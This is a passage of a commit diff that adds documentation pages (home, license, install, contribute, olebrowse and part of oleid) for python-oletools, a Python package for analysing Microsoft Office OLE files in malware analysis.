Peter M. Groen / oletools

Commit 1d0ddff7591940aea11ef25dde6da725121c3262

Authored by Philippe Lagadec
1 parent bf7146ba

added doc subfolder, generated from wiki.

Inline Side-by-side
Showing 25 changed files with 1336 additions and 0 deletions
oletools/doc/Contribute.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="how-to-suggest-improvements-report-issues-or-contribute">How to Suggest Improvements, Report Issues or Contribute</h1>
  11 +<p>This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.</p>
  12 +<p>To <strong>suggest improvements, report a bug or any issue</strong>, please use the <a href="https://bitbucket.org/decalage/olefileio_pl/issues?status=new&amp;status=open">issue reporting page</a>, providing all the information and files to reproduce the problem.</p>
  13 +<p>You may also <a href="http://decalage.info/contact">contact the author</a> directly to <strong>provide feedback</strong>.</p>
  14 +<p>The code is available in <a href="https://bitbucket.org/decalage/oletools">a Mercurial repository on Bitbucket</a>. You may use it to <strong>submit enhancements</strong> using forks and pull requests.</p>
  15 +<hr />
  16 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  17 +<ul>
  18 +<li><a href="Home.html">Home</a></li>
  19 +<li><a href="License.html">License</a></li>
  20 +<li><a href="Install.html">Install</a></li>
  21 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  22 +<li>Tools:
  23 +<ul>
  24 +<li><a href="olebrowse.html">olebrowse</a></li>
  25 +<li><a href="oleid.html">oleid</a></li>
  26 +<li><a href="olemeta.html">olemeta</a></li>
  27 +<li><a href="oletimes.html">oletimes</a></li>
  28 +<li><a href="olevba.html">olevba</a></li>
  29 +<li><a href="pyxswf.html">pyxswf</a></li>
  30 +<li><a href="rtfobj.html">rtfobj</a></li>
  31 +</ul></li>
  32 +</ul>
  33 +</body>
  34 +</html>
... ...
oletools/doc/Contribute.md 0 → 100644
  View file @1d0ddff
  1 +How to Suggest Improvements, Report Issues or Contribute
  2 +========================================================
  3 +
  4 +This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
  5 +
  6 +To **suggest improvements, report a bug or any issue**, please use the [issue reporting page](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open), providing all the information and files to reproduce the problem.
  7 +
  8 +You may also [contact the author](http://decalage.info/contact) directly to **provide feedback**.
  9 +
  10 +The code is available in [a Mercurial repository on Bitbucket](https://bitbucket.org/decalage/oletools). You may use it to **submit enhancements** using forks and pull requests.
  11 +
  12 +--------------------------------------------------------------------------
  13 +
  14 +python-oletools documentation
  15 +-----------------------------
  16 +
  17 +- [[Home]]
  18 +- [[License]]
  19 +- [[Install]]
  20 +- [[Contribute]], Suggest Improvements or Report Issues
  21 +- Tools:
  22 + - [[olebrowse]]
  23 + - [[oleid]]
  24 + - [[olemeta]]
  25 + - [[oletimes]]
  26 + - [[olevba]]
  27 + - [[pyxswf]]
  28 + - [[rtfobj]]
0 29 \ No newline at end of file
... ...
oletools/doc/Home.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="python-oletools-v0.06-documentation">python-oletools v0.06 documentation</h1>
  11 +<p>This is the home page of the documentation for python-oletools. The latest version can be found <a href="https://bitbucket.org/decalage/oletools/wiki">online</a>, otherwise a copy is provided in the doc subfolder of the package.</p>
  12 +<p><a href="http://www.decalage.info/python/oletools">python-oletools</a> is a package of python tools to analyze <a href="http://en.wikipedia.org/wiki/Compound_File_Binary_Format">Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)</a>, such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the <a href="http://www.decalage.info/python/olefileio">OleFileIO_PL</a> parser. See <a href="http://www.decalage.info/python/oletools">http://www.decalage.info/python/oletools</a> for more info.</p>
  13 +<p><strong>Quick links:</strong> <a href="http://www.decalage.info/python/oletools">Home page</a> - <a href="https://bitbucket.org/decalage/oletools/downloads">Download</a> - <a href="https://bitbucket.org/decalage/oletools/wiki">Documentation</a> - <a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">Report Issues/Suggestions/Questions</a> - <a href="http://decalage.info/contact">Contact the author</a> - <a href="https://bitbucket.org/decalage/oletools">Repository</a> - <a href="https://twitter.com/decalage2">Updates on Twitter</a></p>
  14 +<p>Note: python-oletools is not related to OLETools published by BeCubed Software.</p>
  15 +<h2 id="tools-in-python-oletools">Tools in python-oletools:</h2>
  16 +<ul>
  17 +<li><strong><a href="olebrowse.html">olebrowse</a></strong>: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</li>
  18 +<li><strong><a href="oleid.html">oleid</a></strong>: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.</li>
  19 +<li><strong><a href="olemeta.html">olemeta</a></strong>: a tool to extract all standard properties (metadata) from OLE files.</li>
  20 +<li><strong><a href="oletimes.html">oletimes</a></strong>: a tool to extract creation and modification timestamps of all streams and storages.</li>
  21 +<li><strong><a href="olevba.html">olevba</a></strong>: a tool to extract VBA Macro source code from MS Office documents (OLE and OpenXML).</li>
  22 +<li><strong><a href="pyxswf.html">pyxswf</a></strong>: a tool to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.</li>
  23 +<li><strong><a href="rtfobj.html">rtfobj</a></strong>: a tool and python module to extract embedded objects from RTF files.</li>
  24 +<li>and a few others (coming soon)</li>
  25 +</ul>
  26 +<hr />
  27 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  28 +<ul>
  29 +<li><a href="Home.html">Home</a></li>
  30 +<li><a href="License.html">License</a></li>
  31 +<li><a href="Install.html">Install</a></li>
  32 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  33 +<li>Tools:
  34 +<ul>
  35 +<li><a href="olebrowse.html">olebrowse</a></li>
  36 +<li><a href="oleid.html">oleid</a></li>
  37 +<li><a href="olemeta.html">olemeta</a></li>
  38 +<li><a href="oletimes.html">oletimes</a></li>
  39 +<li><a href="olevba.html">olevba</a></li>
  40 +<li><a href="pyxswf.html">pyxswf</a></li>
  41 +<li><a href="rtfobj.html">rtfobj</a></li>
  42 +</ul></li>
  43 +</ul>
  44 +</body>
  45 +</html>
... ...
oletools/doc/Home.md 0 → 100644
  View file @1d0ddff
  1 +python-oletools v0.06 documentation
  2 +===================================
  3 +
  4 +This is the home page of the documentation for python-oletools. The latest version can be found [online](https://bitbucket.org/decalage/oletools/wiki), otherwise a copy is provided in the doc subfolder of the package.
  5 +
  6 +[python-oletools](http://www.decalage.info/python/oletools) is a package of python tools to analyze [Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)](http://en.wikipedia.org/wiki/Compound_File_Binary_Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the [OleFileIO_PL](http://www.decalage.info/python/olefileio) parser. See [http://www.decalage.info/python/oletools](http://www.decalage.info/python/oletools) for more info.
  7 +
  8 +**Quick links:** [Home page](http://www.decalage.info/python/oletools) - [Download](https://bitbucket.org/decalage/oletools/downloads) - [Documentation](https://bitbucket.org/decalage/oletools/wiki) - [Report Issues/Suggestions/Questions](https://bitbucket.org/decalage/oletools/issues?status=new&status=open) - [Contact the author](http://decalage.info/contact) - [Repository](https://bitbucket.org/decalage/oletools) - [Updates on Twitter](https://twitter.com/decalage2)
  9 +
  10 +Note: python-oletools is not related to OLETools published by BeCubed Software.
  11 +
  12 +Tools in python-oletools:
  13 +-------------------------
  14 +
  15 +- **[[olebrowse]]**: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
  16 + view and extract individual data streams.
  17 +- **[[oleid]]**: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.
  18 +- **[[olemeta]]**: a tool to extract all standard properties (metadata) from OLE files.
  19 +- **[[oletimes]]**: a tool to extract creation and modification timestamps of all streams and storages.
  20 +- **[[olevba]]**: a tool to extract VBA Macro source code from MS Office documents (OLE and OpenXML).
  21 +- **[[pyxswf]]**: a tool to detect, extract and analyze Flash objects (SWF) that may
  22 + be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF,
  23 + which is especially useful for malware analysis.
  24 +- **[[rtfobj]]**: a tool and python module to extract embedded objects from RTF files.
  25 +- and a few others (coming soon)
  26 +
  27 +--------------------------------------------------------------------------
  28 +
  29 +python-oletools documentation
  30 +-----------------------------
  31 +
  32 +- [[Home]]
  33 +- [[License]]
  34 +- [[Install]]
  35 +- [[Contribute]], Suggest Improvements or Report Issues
  36 +- Tools:
  37 + - [[olebrowse]]
  38 + - [[oleid]]
  39 + - [[olemeta]]
  40 + - [[oletimes]]
  41 + - [[olevba]]
  42 + - [[pyxswf]]
  43 + - [[rtfobj]]
0 44 \ No newline at end of file
... ...
oletools/doc/Install.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="how-to-download-and-install-python-oletools">How to Download and Install python-oletools</h1>
  11 +<h2 id="pre-requisites">Pre-requisites</h2>
  12 +<p>For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet.</p>
  13 +<h2 id="for-command-line-tools">For command-line tools</h2>
  14 +<p>To use python-oletools from the command line as analysis tools, you may simply <a href="https://bitbucket.org/decalage/oletools/downloads">download the zip archive</a> and extract the files in the directory of your choice.</p>
  15 +<p>You may then add the directory to your PATH environment variable to access the tools from anywhere.</p>
  16 +<h2 id="for-python-applications">For python applications</h2>
  17 +<p>If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use &quot;<strong>pip install oletools</strong>&quot; or &quot;<strong>easy_install oletools</strong>&quot; to download and install the package in one go.</p>
  18 +<p>Otherwise you may download/extract the <a href="https://bitbucket.org/decalage/oletools/downloads">zip archive</a> in a temporary directory and run &quot;<strong>python setup.py install</strong>&quot;.</p>
  19 +<hr />
  20 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  21 +<ul>
  22 +<li><a href="Home.html">Home</a></li>
  23 +<li><a href="License.html">License</a></li>
  24 +<li><a href="Install.html">Install</a></li>
  25 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  26 +<li>Tools:
  27 +<ul>
  28 +<li><a href="olebrowse.html">olebrowse</a></li>
  29 +<li><a href="oleid.html">oleid</a></li>
  30 +<li><a href="olemeta.html">olemeta</a></li>
  31 +<li><a href="oletimes.html">oletimes</a></li>
  32 +<li><a href="olevba.html">olevba</a></li>
  33 +<li><a href="pyxswf.html">pyxswf</a></li>
  34 +<li><a href="rtfobj.html">rtfobj</a></li>
  35 +</ul></li>
  36 +</ul>
  37 +</body>
  38 +</html>
... ...
oletools/doc/Install.md 0 → 100644
  View file @1d0ddff
  1 +How to Download and Install python-oletools
  2 +===========================================
  3 +
  4 +Pre-requisites
  5 +--------------
  6 +
  7 +For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet.
  8 +
  9 +
  10 +For command-line tools
  11 +----------------------
  12 +
  13 +To use python-oletools from the command line as analysis tools, you may simply [download the zip archive](https://bitbucket.org/decalage/oletools/downloads) and extract the files in the directory of your choice.
  14 +
  15 +You may then add the directory to your PATH environment variable to access the tools from anywhere.
  16 +
  17 +For python applications
  18 +----------------------
  19 +
  20 +If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "**pip install oletools**" or "**easy_install oletools**" to download and install the package in one go.
  21 +
  22 +Otherwise you may download/extract the [zip archive](https://bitbucket.org/decalage/oletools/downloads) in a temporary directory and run "**python setup.py install**".
  23 +
  24 +--------------------------------------------------------------------------
  25 +
  26 +python-oletools documentation
  27 +-----------------------------
  28 +
  29 +- [[Home]]
  30 +- [[License]]
  31 +- [[Install]]
  32 +- [[Contribute]], Suggest Improvements or Report Issues
  33 +- Tools:
  34 + - [[olebrowse]]
  35 + - [[oleid]]
  36 + - [[olemeta]]
  37 + - [[oletimes]]
  38 + - [[olevba]]
  39 + - [[pyxswf]]
  40 + - [[rtfobj]]
0 41 \ No newline at end of file
... ...
oletools/doc/License.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="license-for-python-oletools">License for python-oletools</h1>
  11 +<p>This license applies to the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package, apart from the thirdparty folder which contains third-party files published with their own license.</p>
  12 +<p>The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec (<a href="http://www.decalage.info">http://www.decalage.info</a>)</p>
  13 +<p>All rights reserved.</p>
  14 +<p>Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:</p>
  15 +<ul>
  16 +<li>Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.</li>
  17 +<li>Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.</li>
  18 +</ul>
  19 +<p>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</p>
  20 +<table>
  21 +<tbody>
  22 +<tr class="odd">
  23 +<td align="left">License for officeparser</td>
  24 +</tr>
  25 +</tbody>
  26 +</table>
  27 +<p>olevba contains modified source code from the <a href="https://github.com/unixfreak0037/officeparser">officeparser</a> project, published under the following MIT License (MIT):</p>
  28 +<p>officeparser is copyright (c) 2014 John William Davison</p>
  29 +<p>Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the &quot;Software&quot;), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:</p>
  30 +<p>The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.</p>
  31 +<p>THE SOFTWARE IS PROVIDED &quot;AS IS&quot;, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.</p>
  32 +<hr />
  33 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  34 +<ul>
  35 +<li><a href="Home.html">Home</a></li>
  36 +<li><a href="License.html">License</a></li>
  37 +<li><a href="Install.html">Install</a></li>
  38 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  39 +<li>Tools:
  40 +<ul>
  41 +<li><a href="olebrowse.html">olebrowse</a></li>
  42 +<li><a href="oleid.html">oleid</a></li>
  43 +<li><a href="olemeta.html">olemeta</a></li>
  44 +<li><a href="oletimes.html">oletimes</a></li>
  45 +<li><a href="olevba.html">olevba</a></li>
  46 +<li><a href="pyxswf.html">pyxswf</a></li>
  47 +<li><a href="rtfobj.html">rtfobj</a></li>
  48 +</ul></li>
  49 +</ul>
  50 +</body>
  51 +</html>
... ...
oletools/doc/License.md 0 → 100644
  View file @1d0ddff
  1 +License for python-oletools
  2 +===========================
  3 +
  4 +This license applies to the [python-oletools](http://www.decalage.info/python/oletools) package, apart from the thirdparty folder which contains third-party files published with their own license.
  5 +
  6 +The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec ([http://www.decalage.info](http://www.decalage.info))
  7 +
  8 +All rights reserved.
  9 +
  10 +Redistribution and use in source and binary forms, with or without modification,
  11 +are permitted provided that the following conditions are met:
  12 +
  13 + * Redistributions of source code must retain the above copyright notice, this
  14 + list of conditions and the following disclaimer.
  15 + * Redistributions in binary form must reproduce the above copyright notice,
  16 + this list of conditions and the following disclaimer in the documentation
  17 + and/or other materials provided with the distribution.
  18 +
  19 +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
  20 +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  21 +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  22 +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  23 +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  24 +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  25 +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  26 +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  27 +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  28 +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  29 +
  30 +
  31 +----------
  32 +License for officeparser
  33 +------------------------
  34 +
  35 +olevba contains modified source code from the [officeparser](https://github.com/unixfreak0037/officeparser) project, published
  36 +under the following MIT License (MIT):
  37 +
  38 +officeparser is copyright (c) 2014 John William Davison
  39 +
  40 +Permission is hereby granted, free of charge, to any person obtaining a copy
  41 +of this software and associated documentation files (the "Software"), to deal
  42 +in the Software without restriction, including without limitation the rights
  43 +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  44 +copies of the Software, and to permit persons to whom the Software is
  45 +furnished to do so, subject to the following conditions:
  46 +
  47 +The above copyright notice and this permission notice shall be included in all
  48 +copies or substantial portions of the Software.
  49 +
  50 +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  51 +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  52 +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  53 +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  54 +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  55 +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  56 +SOFTWARE.
  57 +
  58 +--------------------------------------------------------------------------
  59 +
  60 +python-oletools documentation
  61 +-----------------------------
  62 +
  63 +- [[Home]]
  64 +- [[License]]
  65 +- [[Install]]
  66 +- [[Contribute]], Suggest Improvements or Report Issues
  67 +- Tools:
  68 + - [[olebrowse]]
  69 + - [[oleid]]
  70 + - [[olemeta]]
  71 + - [[oletimes]]
  72 + - [[olevba]]
  73 + - [[pyxswf]]
  74 + - [[rtfobj]]
0 75 \ No newline at end of file
... ...
oletools/doc/olebrowse.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="olebrowse">olebrowse</h1>
  11 +<p>olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>olebrowse.py [file]</code></pre>
  15 +<p>If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.</p>
  16 +<h2 id="screenshots">Screenshots</h2>
  17 +<p>Main menu, showing all streams in the OLE file:</p>
  18 +<div class="figure">
  19 +<img src="olebrowse1_menu.png" /><p class="caption"></p>
  20 +</div>
  21 +<p>Menu with actions for a stream:</p>
  22 +<div class="figure">
  23 +<img src="olebrowse2_stream.png" /><p class="caption"></p>
  24 +</div>
  25 +<p>Hex view for a stream:</p>
  26 +<div class="figure">
  27 +<img src="olebrowse3_hexview.png" /><p class="caption"></p>
  28 +</div>
  29 +<hr />
  30 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  31 +<ul>
  32 +<li><a href="Home.html">Home</a></li>
  33 +<li><a href="License.html">License</a></li>
  34 +<li><a href="Install.html">Install</a></li>
  35 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  36 +<li>Tools:
  37 +<ul>
  38 +<li><a href="olebrowse.html">olebrowse</a></li>
  39 +<li><a href="oleid.html">oleid</a></li>
  40 +<li><a href="olemeta.html">olemeta</a></li>
  41 +<li><a href="oletimes.html">oletimes</a></li>
  42 +<li><a href="olevba.html">olevba</a></li>
  43 +<li><a href="pyxswf.html">pyxswf</a></li>
  44 +<li><a href="rtfobj.html">rtfobj</a></li>
  45 +</ul></li>
  46 +</ul>
  47 +</body>
  48 +</html>
... ...
oletools/doc/olebrowse.md 0 → 100644
  View file @1d0ddff
  1 +olebrowse
  2 +=========
  3 +
  4 +olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
  5 +view and extract individual data streams.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +Usage
  10 +-----
  11 +
  12 + olebrowse.py [file]
  13 +
  14 +If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
  15 +
  16 +Screenshots
  17 +-----------
  18 +
  19 +Main menu, showing all streams in the OLE file:
  20 +
  21 +![](olebrowse1_menu.png)
  22 +
  23 +Menu with actions for a stream:
  24 +
  25 +![](olebrowse2_stream.png)
  26 +
  27 +Hex view for a stream:
  28 +
  29 +![](olebrowse3_hexview.png)
  30 +
  31 +--------------------------------------------------------------------------
  32 +
  33 +python-oletools documentation
  34 +-----------------------------
  35 +
  36 +- [[Home]]
  37 +- [[License]]
  38 +- [[Install]]
  39 +- [[Contribute]], Suggest Improvements or Report Issues
  40 +- Tools:
  41 + - [[olebrowse]]
  42 + - [[oleid]]
  43 + - [[olemeta]]
  44 + - [[oletimes]]
  45 + - [[olevba]]
  46 + - [[pyxswf]]
  47 + - [[rtfobj]]
0 48 \ No newline at end of file
... ...
oletools/doc/olebrowse1_menu.png 0 → 100644
View file @1d0ddff

38.1 KB
oletools/doc/olebrowse2_stream.png 0 → 100644
View file @1d0ddff

29.1 KB
oletools/doc/olebrowse3_hexview.png 0 → 100644
View file @1d0ddff

39.2 KB
oletools/doc/oleid.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="oleid">oleid</h1>
  11 +<p>oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="main-features">Main Features</h2>
  14 +<ul>
  15 +<li>Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)</li>
  16 +<li>Detect VBA Macros</li>
  17 +<li>Detect embedded Flash objects</li>
  18 +<li>Detect embedded OLE objects</li>
  19 +<li>Detect MS Office encryption</li>
  20 +<li>Can be used as a command-line tool</li>
  21 +<li>Python API to integrate it in your applications</li>
  22 +</ul>
  23 +<p>Planned improvements:</p>
  24 +<ul>
  25 +<li>Extract the most important metadata fields</li>
  26 +<li>Support for OpenXML files and embedded OLE files</li>
  27 +<li>Generic VBA macros detection</li>
  28 +<li>Detect auto-executable VBA macros</li>
  29 +<li>Extended OLE file types detection</li>
  30 +<li>Detect unusual OLE structures (fragmentation, unused sectors, etc)</li>
  31 +<li>Options to scan multiple files</li>
  32 +<li>Options to scan files from encrypted zip archives</li>
  33 +<li>CSV output</li>
  34 +</ul>
  35 +<h2 id="usage">Usage</h2>
  36 +<pre><code>oleid.py &lt;file&gt;</code></pre>
  37 +<h3 id="example">Example</h3>
  38 +<p>Analyzing a Word document containing a Flash object and VBA macros:</p>
  39 +<pre><code>C:\oletools&gt;oleid.py word_flash_vba.doc
  40 +
  41 +Filename: word_flash_vba.doc
  42 +OLE format: True
  43 +Has SummaryInformation stream: True
  44 +Application name: Microsoft Office Word
  45 +Encrypted: False
  46 +Word Document: True
  47 +VBA Macros: True
  48 +Excel Workbook: False
  49 +PowerPoint Presentation: False
  50 +Visio Drawing: False
  51 +ObjectPool: True
  52 +Flash objects: 1</code></pre>
  53 +<h2 id="how-to-use-oleid-in-python-applications">How to use oleid in Python applications</h2>
  54 +<p>TODO</p>
  55 +<hr />
  56 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  57 +<ul>
  58 +<li><a href="Home.html">Home</a></li>
  59 +<li><a href="License.html">License</a></li>
  60 +<li><a href="Install.html">Install</a></li>
  61 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  62 +<li>Tools:
  63 +<ul>
  64 +<li><a href="olebrowse.html">olebrowse</a></li>
  65 +<li><a href="oleid.html">oleid</a></li>
  66 +<li><a href="olemeta.html">olemeta</a></li>
  67 +<li><a href="oletimes.html">oletimes</a></li>
  68 +<li><a href="olevba.html">olevba</a></li>
  69 +<li><a href="pyxswf.html">pyxswf</a></li>
  70 +<li><a href="rtfobj.html">rtfobj</a></li>
  71 +</ul></li>
  72 +</ul>
  73 +</body>
  74 +</html>
... ...
oletools/doc/oleid.md 0 → 100644
  View file @1d0ddff
  1 +oleid
  2 +=====
  3 +
  4 +oleid is a script to analyze OLE files such as MS Office documents (e.g. Word,
  5 +Excel), to detect specific characteristics usually found in malicious files (e.g. malware).
  6 +For example it can detect VBA macros and embedded Flash objects.
  7 +
  8 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  9 +
  10 +## Main Features
  11 +
  12 +- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
  13 +- Detect VBA Macros
  14 +- Detect embedded Flash objects
  15 +- Detect embedded OLE objects
  16 +- Detect MS Office encryption
  17 +- Can be used as a command-line tool
  18 +- Python API to integrate it in your applications
  19 +
